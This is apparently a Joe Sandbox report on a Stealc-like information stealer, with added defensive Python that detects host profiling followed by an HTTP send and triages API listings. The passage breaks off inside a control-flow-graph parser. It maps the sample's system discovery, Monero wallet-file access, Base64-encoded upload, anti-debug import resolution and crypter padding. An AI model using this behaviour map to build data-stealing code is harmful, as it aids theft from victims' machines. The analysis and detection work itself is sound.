15046->15047 15048 9a7500 6 API calls 15047->15048 15049 9a1b96 15048->15049 15050 9aa920 3 API calls 15049->15050 15051 9a1ba9 15050->15051 15052 9aa8a0 lstrcpy 15051->15052 15053 9a1bb2 15052->15053 15054 9aa9b0 4 API calls 15053->15054 15055 9a1bdc 15054->15055 15056 9aa8a0 lstrcpy 15055->15056 15057 9a1be5 15056->15057 15058 9aa9b0 4 API calls 15057->15058 15059 9a1c05 15058->15059 15060 9aa8a0 lstrcpy 15059->15060 15061 9a1c0e 15060->15061 15767 9a7690 GetProcessHeap RtlAllocateHeap 15061->15767 15064 9aa9b0 4 API calls 15065 9a1c2e 15064->15065 15066 9aa8a0 lstrcpy 15065->15066 15067 9a1c37 15066->15067 15068 9aa9b0 4 API calls 15067->15068 15069 9a1c56 15068->15069 15070 9aa8a0 lstrcpy 15069->15070 15071 9a1c5f 15070->15071 15072 9aa9b0 4 API calls 15071->15072 15073 9a1c80 15072->15073 15074 9aa8a0 lstrcpy 15073->15074 15075 9a1c89 15074->15075 15774 9a77c0 GetCurrentProcess IsWow64Process 15075->15774 15078 9aa9b0 4 API calls 15079 9a1ca9 15078->15079 15080 9aa8a0 lstrcpy 15079->15080 15081 9a1cb2 15080->15081 15082 9aa9b0 4 API calls 15081->15082 15083 9a1cd1 15082->15083 15084 9aa8a0 lstrcpy 15083->15084 15085 9a1cda 15084->15085 15086 9aa9b0 4 API calls 15085->15086 15087 9a1cfb 15086->15087 15088 9aa8a0 lstrcpy 15087->15088 15089 9a1d04 15088->15089 15090 9a7850 3 API calls 15089->15090 15091 9a1d14 15090->15091 15092 9aa9b0 4 API calls 15091->15092 15093 9a1d24 15092->15093 15094 9aa8a0 lstrcpy 15093->15094 15095 9a1d2d 15094->15095 15096 9aa9b0 4 API calls 15095->15096 15097 9a1d4c 15096->15097 15098 9aa8a0 lstrcpy 15097->15098 15099 9a1d55 15098->15099 15100 9aa9b0 4 API calls 15099->15100 15101 9a1d75 15100->15101 15102 9aa8a0 lstrcpy 15101->15102 15103 9a1d7e 15102->15103 15104 9a78e0 3 API calls 15103->15104 15105 9a1d8e 15104->15105 15106 9aa9b0 4 API calls 15105->15106 15107 9a1d9e 15106->15107 15108 9aa8a0 lstrcpy 15107->15108 15109 9a1da7 15108->15109 15110 9aa9b0 4 API calls 15109->15110 15111 9a1dc6 15110->15111 15112 9aa8a0 lstrcpy 
[Call-graph edge list (interactive graph data, continued from above; node numbers and edges omitted). Recoverable call order of the host-profiling routine that starts at 0x9a1dcf, each step followed by the string helpers at 0x9aa9b0 / 0x9aa8a0 (lstrcpy, lstrlen, lstrcat):
  0x9a7980  GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA
  0x9a7a30  GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA
  0x9a7b00  GetUserDefaultLocaleName, then 0x9a8d20: LocalAlloc, CharToOemW
  0x9a7b90  GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList, GetLocaleInfoA (loop), LocalFree
  0x9a7d80  GetSystemPowerStatus
  0x9a207e  GetCurrentProcessId, then 0x9a9470: OpenProcess, GetModuleFileNameExA, CloseHandle
  0x9a7e00  GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
  0x9a7f60  GetLogicalProcessorInformationEx, GetLastError, wsprintfA (heap helpers 0x9a89f0 GetProcessHeap/HeapFree and 0x9a8a10 GetProcessHeap/RtlAllocateHeap)
  0x9a7ed0  GetSystemInfo, wsprintfA
  0x9a8100  GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx, __aulldiv, wsprintfA
  0x9a87c0  GetProcessHeap, RtlAllocateHeap, wsprintfA
  0x9a81f0  string assembly only (lstrcpy loop)
  0x9a8320  (called twice, 17 API calls) RegOpenKeyExA, RegEnumKeyExA (loop), wsprintfA, RegOpenKeyExA, RegQueryValueExA, lstrlen, RegQueryValueExA, RegCloseKey
  0x9a8680  CreateToolhelp32Snapshot, Process32First, Process32Next (loop), CloseHandle
  0x9a265a  lstrlen, then 0x9a5190 -> 0x995100: InternetOpenA, StrCmpCA, GetSystemTime (0x9a8b60), InternetConnectA, HttpOpenRequestA, InternetCloseHandle; the collected data is first encoded via 0x9a8ea0 (CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA)
Other routines in the same graph:
  0x995009  InternetOpenUrlA, InternetReadFile, InternetCloseHandle x2
  0x9947c6  lstrlen, InternetCrackUrlA
  0x999af9  LocalAlloc, CryptStringToBinaryA, LocalFree
  0x9a76c6 and 0x9a7720  RegOpenKeyExA, RegQueryValueExA, RegCloseKey
  0x9a0759  StrCmpCA dispatch at 0x9a0799 / 0x9a0865 / 0x9a099c into 0x9a0250 and 0x99fb00
  0x996d40  0x996530: VirtualAlloc x2; 0x9969b0: LoadLibraryA, GetProcAddress (loop); then VirtualFree, FreeLibrary (a sequence consistent with an in-memory PE loader)]
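The call graph above recovers an ordered API trace: a burst of discovery calls (time zone, locale, keyboard layouts, power status, process list, registry, CPU and memory) followed by a WinINet request. The detection below is an added example, not part of the Joe Sandbox report or of the sample: it scans such a trace and fires when enough distinct discovery categories precede a network call within a bounded window. The category table is an assumption made for the example, and the sample trace is constructed from the call order recovered from the graph rather than copied from a real monitor log.

```python
# Sequence detection over an ordered Win32 API trace: host-profiling burst
# followed by a WinINet call. Added example; the category table below is a
# hypothetical mapping chosen for this demonstration, not from the report.
DISCOVERY = {
    "GetLocalTime": "time", "GetTimeZoneInformation": "time", "GetSystemTime": "time",
    "GetUserDefaultLocaleName": "locale", "GetLocaleInfoA": "locale",
    "GetKeyboardLayoutList": "locale",
    "GetSystemPowerStatus": "power",
    "GetModuleFileNameExA": "process", "CreateToolhelp32Snapshot": "process",
    "Process32First": "process", "Process32Next": "process",
    "RegQueryValueExA": "registry", "RegEnumKeyExA": "registry",
    "GetLogicalProcessorInformationEx": "hardware", "GetSystemInfo": "hardware",
    "GlobalMemoryStatusEx": "hardware",
}
NETWORK = {"InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
           "HttpSendRequestA", "InternetOpenUrlA"}
ENCODING = {"CryptBinaryToStringA"}


def detect_profile_exfil(trace, min_categories=4, window=200):
    """Scan an ordered API trace. When a WinINet call appears, look back `window`
    calls and count the distinct discovery categories touched; report a match
    when at least `min_categories` were seen. Also note whether the collected
    data was run through CryptBinaryToStringA inside the same window."""
    seen = []           # (index, category) for every discovery call
    encoded_at = None   # index of the most recent CryptBinaryToStringA
    for i, api in enumerate(trace):
        cat = DISCOVERY.get(api)
        if cat:
            seen.append((i, cat))
        elif api in ENCODING:
            encoded_at = i
        elif api in NETWORK:
            cats = sorted({c for j, c in seen if i - j <= window})
            if len(cats) >= min_categories:
                return True, {
                    "categories": cats,
                    "network_api": api,
                    "index": i,
                    "encoded_before_send": encoded_at is not None and i - encoded_at <= window,
                }
    return False, {}


# Constructed trace following the call order recovered from the graph above
# (string-helper noise represented by lstrcpy); not a captured monitor log.
_S = ["lstrcpy"] * 4
STEALC_LIKE = (
    ["GetProcessHeap", "RtlAllocateHeap", "GetLocalTime", "wsprintfA"] + _S
    + ["GetProcessHeap", "RtlAllocateHeap", "GetTimeZoneInformation", "wsprintfA"] + _S
    + ["GetUserDefaultLocaleName", "LocalAlloc", "CharToOemW"] + _S
    + ["GetKeyboardLayoutList", "LocalAlloc", "GetKeyboardLayoutList", "GetLocaleInfoA", "LocalFree"] + _S
    + ["GetSystemPowerStatus"] + _S
    + ["GetCurrentProcessId", "OpenProcess", "GetModuleFileNameExA", "CloseHandle"] + _S
    + ["RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"] + _S
    + ["GetLogicalProcessorInformationEx", "wsprintfA", "GetSystemInfo", "wsprintfA",
       "GlobalMemoryStatusEx", "wsprintfA"]
    + ["RegOpenKeyExA", "RegEnumKeyExA", "RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"] * 2
    + ["CreateToolhelp32Snapshot", "Process32First", "Process32Next", "Process32Next", "CloseHandle"]
    + ["lstrlen", "CryptBinaryToStringA", "InternetOpenA", "GetSystemTime",
       "InternetConnectA", "HttpOpenRequestA", "InternetCloseHandle"]
)
# A benign-looking trace: one discovery call, then a download.
BENIGN = ["GetSystemInfo", "GetProcessHeap", "InternetOpenA", "InternetConnectA"]

if __name__ == "__main__":
    print(detect_profile_exfil(STEALC_LIKE))
    print(detect_profile_exfil(BENIGN))
```

The window bound matters: the same discovery calls spread over an hour of ordinary activity should not fire, so tune `window` to the trace granularity (calls, not seconds, here) and raise `min_categories` if a legitimate installer in your fleet trips it.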

Control-flow Graph (function 0x9a9860; the interactive view's executed / not-executed colouring is not reproduced)
  9a9860-9a9874  call 9a9750
  9a987a-9a9a8e  call 9a9780; GetProcAddress x21 (module handle 75900000)
  9a9a93-9a9af2  LoadLibraryA x5
  9a9af4-9a9b08  GetProcAddress (conditional block)
  9a9b16-9a9b41  GetProcAddress x2 (conditional block)
  9a9b4f-9a9b63  GetProcAddress (conditional block)
  9a9b71-9a9b84  GetProcAddress (conditional block)
  9a9b92-9a9bbc  GetProcAddress x2 (conditional block; includes the NtQueryInformationProcess resolution at 009A9BB6)
  9a9bc1-9a9bc2  end of function
                        APIs
                        • GetProcAddress.KERNEL32(75900000,015B07C8), ref: 009A98A1
                        • GetProcAddress.KERNEL32(75900000,015B0810), ref: 009A98BA
                        • GetProcAddress.KERNEL32(75900000,015B0738), ref: 009A98D2
                        • GetProcAddress.KERNEL32(75900000,015B0828), ref: 009A98EA
                        • GetProcAddress.KERNEL32(75900000,015B06D8), ref: 009A9903
                        • GetProcAddress.KERNEL32(75900000,015B8A70), ref: 009A991B
                        • GetProcAddress.KERNEL32(75900000,015A64C0), ref: 009A9933
                        • GetProcAddress.KERNEL32(75900000,015A6440), ref: 009A994C
                        • GetProcAddress.KERNEL32(75900000,015B0630), ref: 009A9964
                        • GetProcAddress.KERNEL32(75900000,015B06F0), ref: 009A997C
                        • GetProcAddress.KERNEL32(75900000,015B0648), ref: 009A9995
                        • GetProcAddress.KERNEL32(75900000,015B0708), ref: 009A99AD
                        • GetProcAddress.KERNEL32(75900000,015A63C0), ref: 009A99C5
                        • GetProcAddress.KERNEL32(75900000,015B0768), ref: 009A99DE
                        • GetProcAddress.KERNEL32(75900000,015B0798), ref: 009A99F6
                        • GetProcAddress.KERNEL32(75900000,015A6280), ref: 009A9A0E
                        • GetProcAddress.KERNEL32(75900000,015B07B0), ref: 009A9A27
                        • GetProcAddress.KERNEL32(75900000,015B0900), ref: 009A9A3F
                        • GetProcAddress.KERNEL32(75900000,015A6620), ref: 009A9A57
                        • GetProcAddress.KERNEL32(75900000,015B0870), ref: 009A9A70
                        • GetProcAddress.KERNEL32(75900000,015A65A0), ref: 009A9A88
                        • LoadLibraryA.KERNEL32(015B0888,?,009A6A00), ref: 009A9A9A
                        • LoadLibraryA.KERNEL32(015B08D0,?,009A6A00), ref: 009A9AAB
                        • LoadLibraryA.KERNEL32(015B08E8,?,009A6A00), ref: 009A9ABD
                        • LoadLibraryA.KERNEL32(015B0918,?,009A6A00), ref: 009A9ACF
                        • LoadLibraryA.KERNEL32(015B0858,?,009A6A00), ref: 009A9AE0
                        • GetProcAddress.KERNEL32(75070000,015B08B8), ref: 009A9B02
                        • GetProcAddress.KERNEL32(75FD0000,015B08A0), ref: 009A9B23
                        • GetProcAddress.KERNEL32(75FD0000,015B8D90), ref: 009A9B3B
                        • GetProcAddress.KERNEL32(75A50000,015B8CB8), ref: 009A9B5D
                        • GetProcAddress.KERNEL32(74E50000,015A6560), ref: 009A9B7E
                        • GetProcAddress.KERNEL32(76E80000,015B8B20), ref: 009A9B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 009A9BB6
                        Strings
• NtQueryInformationProcess, xrefs: 009A9BAA (passed by name to the GetProcAddress call at 009A9BB6 against module handle 76E80000; NtQueryInformationProcess is an ntdll.dll export, and this is the only one of the function's 28 GetProcAddress targets whose name is readable in the listing, the other 27 are passed as pointers in the 015Axxxx/015Bxxxx range rather than as literal names)
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: f687af4f4d61e2d016cc136c33afbe23791c5d91cd408e99e874a058ad5c77d5
                        • Instruction ID: 9317364c7f60f8fde131eda1235a249acdd8fefea3c5f431858173410fdcdad6
                        • Opcode Fuzzy Hash: f687af4f4d61e2d016cc136c33afbe23791c5d91cd408e99e874a058ad5c77d5
                        • Instruction Fuzzy Hash: 9BA17DB56032419FC344EFA8EDB8A56BBF9F74C301704451BAA09C32A4FE3A9941DB57

Control-flow Graph (function 0x9945c0; the interactive view's executed / not-executed colouring is not reproduced)
  9945c0-994695  RtlAllocateHeap
  9946a0-9946a6  loop head; 9946ac-99474a loop body with a back-edge to 9946a0
  99474f-9947a9  VirtualProtect (loop exit)
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0099460E
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0099479C (dwSize 4, flNewProtect 0x100 = PAGE_GUARD, consistent with the guard-page signature in the overview)
                        Strings
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30 reference sites): 009945C7, 009945D2, 009945DD, 009945E8, 009945F3, 00994617, 00994622, 0099462D, 00994638, 00994643, 00994657, 00994662, 0099466D, 00994678, 00994683, 009946AC, 009946B7, 009946C2, 009946CD, 009946D8, 00994713, 0099471E, 00994729, 00994734, 0099473F, 0099474F, 0099475A, 00994765, 00994770, 0099477B
The same benign sentence is referenced from 30 sites of a routine whose only other calls are RtlAllocateHeap and VirtualProtect; junk text of this kind is characteristic of crypter padding inserted to inflate and disguise the stub, and it is not data the stealer itself uses.
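Two of the listings above are worth extracting automatically when triaging reports of this kind: the GetProcAddress / LoadLibraryA block of function 0x9a9860 (one readable export name, NtQueryInformationProcess, among 28 resolutions by pointer) and the RtlAllocateHeap / VirtualProtect block of function 0x9945c0 with its 30-fold decoy string. The script below is an added example and not part of the Joe Sandbox report: it parses the "APIs" and "Strings" bullet formats shown on this page, groups dynamic import resolution by module handle, separates readable export names from name pointers, and flags long strings referenced from many sites. The watchlists are assumptions chosen for the example, and the embedded input is an abbreviated excerpt constructed from the lines above, not the complete listings.

```python
import re
from collections import Counter, defaultdict

# "APIs" bullets of a Joe Sandbox function listing, e.g.
#   GetProcAddress.KERNEL32(75900000,015B07C8), ref: 009A98A1
API_RE = re.compile(
    r"^\s*[\u2022*-]?\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "Strings" bullets, e.g.
#   NtQueryInformationProcess, xrefs: 009A9BAA
STR_RE = re.compile(r"^\s*[\u2022*-]?\s*(?P<s>.+), xrefs:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Hypothetical watchlists (not part of the report): exports whose run-time
# resolution usually serves anti-debugging, and APIs that change page permissions.
WATCH_EXPORTS = {"NtQueryInformationProcess", "NtSetInformationThread", "IsDebuggerPresent"}
WATCH_MEMORY = {"VirtualProtect", "VirtualAlloc", "NtProtectVirtualMemory"}


def parse_listing(text):
    """Split a function listing into (api, module, args, ref) and (string, xref) tuples."""
    apis, strings = [], []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",") if a.strip()]
            apis.append((m["api"], m["mod"], args, m["ref"].upper()))
            continue
        m = STR_RE.match(line)
        if m:
            strings.append((m["s"].strip(), m["ref"].upper()))
    return apis, strings


def dynamic_imports(apis):
    """Count GetProcAddress per module handle and keep export names that are
    readable in the listing (an 8-hex-digit second argument is a name pointer)."""
    per_module, named, loads = Counter(), defaultdict(set), 0
    for api, _mod, args, _ref in apis:
        if api in ("LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"):
            loads += 1
        elif api == "GetProcAddress" and len(args) >= 2:
            handle = args[0].upper()
            per_module[handle] += 1
            if not HEX8_RE.match(args[1]):
                named[handle].add(args[1])
    return {"per_module": dict(per_module),
            "named": {k: sorted(v) for k, v in named.items()},
            "loadlibrary": loads}


def decoy_strings(strings, min_len=40, min_xrefs=5):
    """Long strings referenced from many sites: typical crypter padding."""
    counts = Counter(s for s, _ in strings if len(s) >= min_len)
    return {s: n for s, n in counts.items() if n >= min_xrefs}


def triage(text):
    """Return human-readable findings for one function listing."""
    apis, strings = parse_listing(text)
    imports = dynamic_imports(apis)
    findings = []
    for handle, names in imports["named"].items():
        findings += [f"anti-debug export {n} resolved from module handle {handle}"
                     for n in names if n in WATCH_EXPORTS]
    findings += [f"{api}({', '.join(args)}) at {ref}"
                 for api, _m, args, ref in apis if api in WATCH_MEMORY]
    total = sum(imports["per_module"].values())
    if total >= 10:
        findings.append(f"{total} GetProcAddress calls over {len(imports['per_module'])} "
                        f"module handles after {imports['loadlibrary']} LoadLibrary calls")
    findings += [f"decoy string referenced {n} times: {s[:40]}..."
                 for s, n in decoy_strings(strings).items()]
    return findings


# Constructed excerpt of the two listings on this page (abbreviated, not the full report).
DECOY = ("The Opus Theatre was founded by British-Argentine composer and concert pianist "
         "Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.")
SAMPLE = "\n".join([
    "GetProcAddress.KERNEL32(75900000,015B07C8), ref: 009A98A1",
    "GetProcAddress.KERNEL32(75900000,015B0810), ref: 009A98BA",
    "GetProcAddress.KERNEL32(75900000,015B0738), ref: 009A98D2",
    "LoadLibraryA.KERNEL32(015B0888,?,009A6A00), ref: 009A9A9A",
    "LoadLibraryA.KERNEL32(015B08D0,?,009A6A00), ref: 009A9AAB",
    "GetProcAddress.KERNEL32(75FD0000,015B08A0), ref: 009A9B23",
    "GetProcAddress.KERNEL32(76E80000,015B8B20), ref: 009A9B9F",
    "GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 009A9BB6",
    "RtlAllocateHeap.NTDLL(00000000), ref: 0099460E",
    "VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0099479C",
] + [f"{DECOY}, xrefs: {x}" for x in ("00994662", "00994622", "009946C2", "00994643", "0099466D")])

if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```

Run against the full listings the per-module counter reproduces the 21 resolutions on handle 75900000 and the 7 spread over the five libraries loaded afterwards; the pointer-versus-name split is what makes the single readable NtQueryInformationProcess stand out.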
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: the same 14 associated dump regions (00000000.00000002.2088626675.0000000000990000 through 00000000.00000002.2090329232.000000000104A000) as listed under Memory Dump Source for the function above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
• String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, joined by '$', one copy per xref listed under Strings)
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: eaff07b774fbf4364c0c3b988e58bcbe67d2a1f61f7fd23ea6891b943b33b3b5
                        • Instruction ID: 4bfef5eda39b7c482217e798fb0bff3af55072fe0d061c2ba370f918b0467219
                        • Opcode Fuzzy Hash: eaff07b774fbf4364c0c3b988e58bcbe67d2a1f61f7fd23ea6891b943b33b3b5
                        • Instruction Fuzzy Hash: 984116607FB60C7BC629BBE4D9CEFDE77667FC6F18F615844A80052280CAB069807525

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        Basic blocks of the function at 0x994880 (block id, address range, internal calls and named API calls in order, then successor blocks):
                        • 801 (994880-994942): call 9aa7a0, call 9947b0, call 9aa740 * 5, InternetOpenA, StrCmpCA -> 816, 817
                        • 816 (99494b-99494f) -> 818, 819
                        • 817 (994944) -> 816
                        • 818 (994ecb-994ef3): InternetCloseHandle, call 9aaad0, call 999ac0 -> 829, 830
                        • 819 (994955-994acd): call 9a8b60, call 9aa920, call 9aa8a0, call 9aa800 * 2, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa920, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa920, call 9aa8a0, call 9aa800 * 2, InternetConnectA -> 818, 905
                        • 829 (994f32-994fa2): call 9a8990 * 2, call 9aa7a0, call 9aa800 * 8
                        • 830 (994ef5-994f2d): call 9aa820, call 9aa9b0, call 9aa8a0, call 9aa800 -> 829
                        • 905 (994ad3-994ad7) -> 906, 907
                        • 906 (994ad9-994ae3) -> 908
                        • 907 (994ae5) -> 908
                        • 908 (994aef-994b22): HttpOpenRequestA -> 909, 910
                        • 909 (994b28-994e28): call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa920, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa920, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa920, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa9b0, call 9aa8a0, call 9aa800, call 9aa920, call 9aa8a0, call 9aa800, call 9aa740, call 9aa920 * 2, call 9aa8a0, call 9aa800 * 2, call 9aaad0, lstrlen, call 9aaad0 * 2, lstrlen, call 9aaad0, HttpSendRequestA -> 1021
                        • 910 (994ebe-994ec5): InternetCloseHandle -> 818
                        • 1021 (994e32-994e5c): InternetReadFile -> 1022, 1023
                        • 1022 (994e5e-994e65) -> 1023, 1024
                        • 1023 (994e67-994eb9): InternetCloseHandle, call 9aa800 -> 910
                        • 1024 (994e69-994ea7): call 9aa9b0, call 9aa8a0, call 9aa800 -> 1021
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                          • Part of subcall function 009947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00994915
                        • StrCmpCA.SHLWAPI(?,015BE270), ref: 0099493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00994ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,009B0DDB,00000000,?,?,00000000,?,",00000000,?,015BE250), ref: 00994DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00994E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00994E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00994E49
                        • InternetCloseHandle.WININET(00000000), ref: 00994EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00994EC5
                        • HttpOpenRequestA.WININET(00000000,015BE3C0,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00994B15
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • InternetCloseHandle.WININET(00000000), ref: 00994ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: d586725abb28b466d4a8824997486b6760cada0d54c79e0cac72513de0aa42d3
                        • Instruction ID: 0ac2a7cf61a213817ea9b44fd22b4fcbdbc0fe57c191912e8fe84b40adecfd44
                        • Opcode Fuzzy Hash: d586725abb28b466d4a8824997486b6760cada0d54c79e0cac72513de0aa42d3
                        • Instruction Fuzzy Hash: C7122C72910118ABDB55EB94DDA2FEEB338BF96300F504199B10663091EF742F49CFA6
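                        The control-flow graph dump for this function is easier to reason about once it is parsed. The following Python is an added example, not Joe Sandbox output and not code from the sample: it takes the dump text (copied verbatim from this entry as its constructed input), recovers basic blocks and edges, and reports which blocks form a loop and in what order the named APIs appear. The token format it assumes (a numeric block id followed by an address range, `call <addr>` for internal calls, `* n` repeating the preceding item, `a->b` for edges) is my reading of the dump, not a documented format. The result shows that InternetReadFile sits on the 1021 -> 1022 -> 1024 -> 1021 cycle, i.e. the response is read in a loop (the APIs list shows a 0x7CF-byte chunk per call), while InternetOpenA, InternetConnectA, HttpOpenRequestA and HttpSendRequestA each run once before it.

```python
import re
from collections import defaultdict

# Constructed input: the control_flow_graph text printed in this report entry for the
# function at 0x994880, copied verbatim (tokens are whitespace-separated, so it may wrap).
CFG_TEXT = """
control_flow_graph 801 994880-994942 call 9aa7a0 call 9947b0 call 9aa740 * 5 InternetOpenA StrCmpCA
816 99494b-99494f 801->816 817 994944 801->817 818 994ecb-994ef3 InternetCloseHandle call 9aaad0
call 999ac0 816->818 819 994955-994acd call 9a8b60 call 9aa920 call 9aa8a0 call 9aa800 * 2 call 9aa9b0
call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa920 call 9aa8a0 call 9aa800
call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa920
call 9aa8a0 call 9aa800 * 2 InternetConnectA 816->819 817->816 829 994f32-994fa2 call 9a8990 * 2
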